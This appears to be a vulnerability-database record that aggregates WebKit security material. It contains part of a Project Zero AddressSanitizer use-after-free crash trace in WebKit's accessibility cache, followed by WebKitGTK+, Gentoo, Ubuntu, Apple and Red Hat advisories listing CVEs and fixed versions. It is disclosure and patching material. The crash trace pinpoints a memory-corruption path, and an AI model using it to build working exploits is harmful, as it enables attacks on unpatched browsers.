0x1137764b1 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9574b1) #9 0x112e437cc in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x247cc) #10 0x112e47a63 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a63) #11 0x112e47dce in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28dce) #12 0x112e40a59 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a59) #13 0x112e47eec in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28eec) #14 0x112e79f53 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5af53) #15 0x112e613eb in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x423eb) #16 0x112ff54b1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d64b1) #17 0x112ff377f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d477f) #18 0x112ff8bbd in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9bbd) #19 0x113007cea in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cea) #20 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) #21 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) #22 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) #23 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) #24 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) #25 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) #26 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) #27 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #28 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #29 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) previously allocated by thread T0 here: #0 0x10ca9bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) #2 0x11ffeead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) #3 0x11ffecd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) #4 0x11ff73247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) #5 0x11ff7263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) #6 0x113011c38 in WTF::ListHashSetNode<WebCore::Node*>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f2c38) #7 0x113020d79 in void WTF::ListHashSetTranslator<WTF::PtrHash<WebCore::Node*> >::translate<WTF::ListHashSetNode<WebCore::Node*>, WebCore::Node* const&, std::nullptr_t>(WTF::ListHashSetNode<WebCore::Node*>*&, WebCore::Node* const&&&, std::nullptr_t&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x201d79) #8 0x112ffbec9 in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::add(WebCore::Node* const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dcec9) #9 0x112ffb785 in WebCore::AXObjectCache::deferTextChangedIfNeeded(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dc785) #10 0x11376c58e in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d58e) #11 0x11377298d in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95398d) #12 0x1137727a1 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9537a1) #13 0x11376bf12 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cf12) #14 0x11376bd0b in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cd0b) #15 0x114443e31 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1624e31) #16 0x1144392e8 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x161a2e8) #17 0x3c5768201027 (<unknown module>) #18 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) #19 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) #20 0x11f91ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) #21 0x11f583847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) #22 0x11f50488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) #23 0x11eb1d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) #24 0x11eb1d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) #25 0x11eb1dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) #26 0x11405d615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) #27 0x1144706cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) #28 0x1137dc010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) #29 0x1137dbae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) in WTF::ListHashSetConstIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() Shadow bytes around the buggy address: 0x1c0600068cd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068ce0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x1c0600068cf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x1c0600068d00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068d10: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa =>0x1c0600068d20: fd fd fd fa fa fa fd fd[fd]fa fa fa 00 00 00 02 0x1c0600068d30: fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa fd fd 0x1c0600068d40: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x1c0600068d50: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x1c0600068d60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068d70: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==30369==ABORTING This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric . ------------------------------------------------------------------------ WebKitGTK+ Security Advisory WSA-2017-0009 ------------------------------------------------------------------------ Date reported : November 10, 2017 Advisory ID : WSA-2017-0009 Advisory URL : https://webkitgtk.org/security/WSA-2017-0009.html CVE identifiers : CVE-2017-13783, CVE-2017-13784, CVE-2017-13785, CVE-2017-13788, CVE-2017-13791, CVE-2017-13792, CVE-2017-13793, CVE-2017-13794, CVE-2017-13795, CVE-2017-13796, CVE-2017-13798, CVE-2017-13802, CVE-2017-13803. Several vulnerabilities were discovered in WebKitGTK+. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to xisigr of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Hanul Choi working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to chenqin (ee|) of Ant-financial Light-Year Security. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, November 10, 2017 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201712-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebKitGTK+: Multiple vulnerabilities Date: December 14, 2017 Bugs: #637076 ID: 201712-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.18.3 >= 2.18.3 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There are no known workarounds at this time. Resolution ========== All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.18.3" References ========== [ 1 ] CVE-2017-13783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13783 [ 2 ] CVE-2017-13784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13784 [ 3 ] CVE-2017-13785 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13785 [ 4 ] CVE-2017-13788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13788 [ 5 ] CVE-2017-13791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13791 [ 6 ] CVE-2017-13792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13792 [ 7 ] CVE-2017-13793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13793 [ 8 ] CVE-2017-13794 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13794 [ 9 ] CVE-2017-13795 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13795 [ 10 ] CVE-2017-13796 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13796 [ 11 ] CVE-2017-13798 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13798 [ 12 ] CVE-2017-13802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13802 [ 13 ] CVE-2017-13803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13803 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201712-01 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . =========================================================================== Ubuntu Security Notice USN-3481-1 November 16, 2017 webkit2gtk vulnerabilities =========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 17.10 - Ubuntu 17.04 - Ubuntu 16.04 LTS Summary: Several security issues were fixed in WebKitGTK+. Software Description: - webkit2gtk: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 17.10: libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.17.10.1 libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.17.10.1 Ubuntu 17.04: libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.17.04.1 libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.17.04.1 Ubuntu 16.04 LTS: libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.16.04.1 libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.16.04.1 This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any applications that use WebKitGTK+, such as Epiphany, to make all the necessary changes. References: https://www.ubuntu.com/usn/usn-3481-1 CVE-2017-13783, CVE-2017-13784, CVE-2017-13785, CVE-2017-13788, CVE-2017-13791, CVE-2017-13792, CVE-2017-13793, CVE-2017-13794, CVE-2017-13795, CVE-2017-13796, CVE-2017-13798, CVE-2017-13802, CVE-2017-13803 Package Information: https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.10.1 https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.04.1 https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.16.04.1 --cAJSiv6PLl8jlntXfAr5kK8XnnPQvgKnJ-- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2017-10-31-1 iOS 11.1 iOS 11.1 is now available and addresses the following: CoreText Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted text file may lead to an unexpected application termination Description: A denial of service issue was addressed through improved memory handling. CVE-2017-13849: Ro of SavSec Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13799: an anonymous researcher Messages Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to access photos from the lock screen Description: A lock screen issue allowed access to photos via Reply With Message on a locked device. This issue was addressed with improved state management. CVE-2017-13844: Miguel Alvarado of iDeviceHelp INC Siri Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to use Siri to read notifications of content that is set not to be displayed at the lock screen Description: An issue existed with Siri permissions. This was addressed with improved permission checking. CVE-2017-13805: Yiğit Can YILMAZ (@yilmazcanyigit) StreamingZip Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious zip file may be able modify restricted areas of the file system Description: A path handling issue was addressed with improved validation. CVE-2017-13804: @qwertyoruiopz at KJC Research Intl. S.R.L. UIKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Characters in a secure text field might be revealed Description: The characters in a secure text field were revealed during focus change events. This issue was addressed through improved state management. CVE-2017-7113: an anonymous researcher, Duraiamuthan Harikrishnan of Tech Mahindra, Ricardo Sampayo of Bemo Ltd WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. This was addressed with improved state management. CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAln4u7opHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbQiw// bEkSQWlXTfpJ/9F2VKbMv+++td8sXozC3ICj9Ho+zhctxNY3MvIqXY8B4MrWB5+e wgz1X/EQSCMItE2u20uISfApls/8/pBde6kKnca9rPGr7I2BKsuHTfCT3taSkhoj EWMHEb64Se0hSiWKj99HJ80It9bDGSHz1cofpYDCNSMFBCiGWF2EbMgxUa55T5Vx BtWZ91y2oU6gTsu4ZSR5NXG+Hi/vFYDnAFSr2/5Dgud4fl0tYk1KZ725g2YvXT7S E3qV6shwcQtpf5ixm4G2cYalfiAmkYYjA/q2sgLClHDVXaPzahTS9ScMygKo4BsZ RDboCM0q0ywPl+xnNJFuq2ZpZAfMefuXpcjTSxBDoNXliphzH2YOjk5YtHV47S+x E8+b/bGDvBiKXJFo+yotJ07er0XtFPxfJKwgaYAi8VAfEXZrIv0uDQfYIZieMIRz VznZvlaKXpA1Ms3R3rY2ukI9gdyPD0wk7r8zAGD0eTdl8E0bMI89UaSMWqDGf1Jm 9AWKOB7na2ElWNHeEMUAhReOL4jHqu/FLkRuoYVAiYKYUDWJGDlD79Yz8bTqnwtu AWHqstzzcUVg1HXcwR5ngUDGFFOU2vVkqZRK6uwzCRzd/a7QQ/Lu+86GkfxPUB+p 9rtwIDGcTg0795ylrx8NLY/3BD8xcBMhfcZbpX5TF8s= =qJV/ -----END PGP SIGNATURE----- _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
var-202006-1830 A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. Apple iPadOS is an operating system for iPad tablets. WebKit is one of the web browser engine components. A security vulnerability exists in the WebKit component of several Apple products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update Advisory ID: RHSA-2020:5633-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2020:5633 Issue date: 2021-02-24 CVE Names: CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 CVE-2018-14553 CVE-2018-14879 CVE-2018-14880 CVE-2018-14881 CVE-2018-14882 CVE-2018-16227 CVE-2018-16228 CVE-2018-16229 CVE-2018-16230 CVE-2018-16300 CVE-2018-16451 CVE-2018-16452 CVE-2018-20843 CVE-2019-3884 CVE-2019-5018 CVE-2019-6977 CVE-2019-6978 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-9455 CVE-2019-9458 CVE-2019-11068 CVE-2019-12614 CVE-2019-13050 CVE-2019-13225 CVE-2019-13627 CVE-2019-14889 CVE-2019-15165 CVE-2019-15166 CVE-2019-15903 CVE-2019-15917 CVE-2019-15925 CVE-2019-16167 CVE-2019-16168 CVE-2019-16231 CVE-2019-16233 CVE-2019-16935 CVE-2019-17450 CVE-2019-17546 CVE-2019-18197 CVE-2019-18808 CVE-2019-18809 CVE-2019-19046 CVE-2019-19056 CVE-2019-19062 CVE-2019-19063 CVE-2019-19068 CVE-2019-19072 CVE-2019-19221 CVE-2019-19319 CVE-2019-19332 CVE-2019-19447 CVE-2019-19524 CVE-2019-19533 CVE-2019-19537 CVE-2019-19543 CVE-2019-19602 CVE-2019-19767 CVE-2019-19770 CVE-2019-19906 CVE-2019-19956 CVE-2019-20054 CVE-2019-20218 CVE-2019-20386 CVE-2019-20387 CVE-2019-20388 CVE-2019-20454 CVE-2019-20636 CVE-2019-20807 CVE-2019-20812 CVE-2019-20907 CVE-2019-20916 CVE-2020-0305 CVE-2020-0444 CVE-2020-1716 CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 CVE-2020-1971 CVE-2020-2574 CVE-2020-2752 CVE-2020-2922 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3898 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-6405 CVE-2020-7595 CVE-2020-7774 CVE-2020-8177 CVE-2020-8492 CVE-2020-8563 CVE-2020-8566 CVE-2020-8619 CVE-2020-8622 CVE-2020-8623 CVE-2020-8624 CVE-2020-8647 CVE-2020-8648 CVE-2020-8649 CVE-2020-9327 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 CVE-2020-10732 CVE-2020-10749 CVE-2020-10751 CVE-2020-10763 CVE-2020-10773 CVE-2020-10774 CVE-2020-10942 CVE-2020-11565 CVE-2020-11668 CVE-2020-11793 CVE-2020-12465 CVE-2020-12655 CVE-2020-12659 CVE-2020-12770 CVE-2020-12826 CVE-2020-13249 CVE-2020-13630 CVE-2020-13631 CVE-2020-13632 CVE-2020-14019 CVE-2020-14040 CVE-2020-14381 CVE-2020-14382 CVE-2020-14391 CVE-2020-14422 CVE-2020-15157 CVE-2020-15503 CVE-2020-15862 CVE-2020-15999 CVE-2020-16166 CVE-2020-24490 CVE-2020-24659 CVE-2020-25211 CVE-2020-25641 CVE-2020-25658 CVE-2020-25661 CVE-2020-25662 CVE-2020-25681 CVE-2020-25682 CVE-2020-25683 CVE-2020-25684 CVE-2020-25685 CVE-2020-25686 CVE-2020-25687 CVE-2020-25694 CVE-2020-25696 CVE-2020-26160 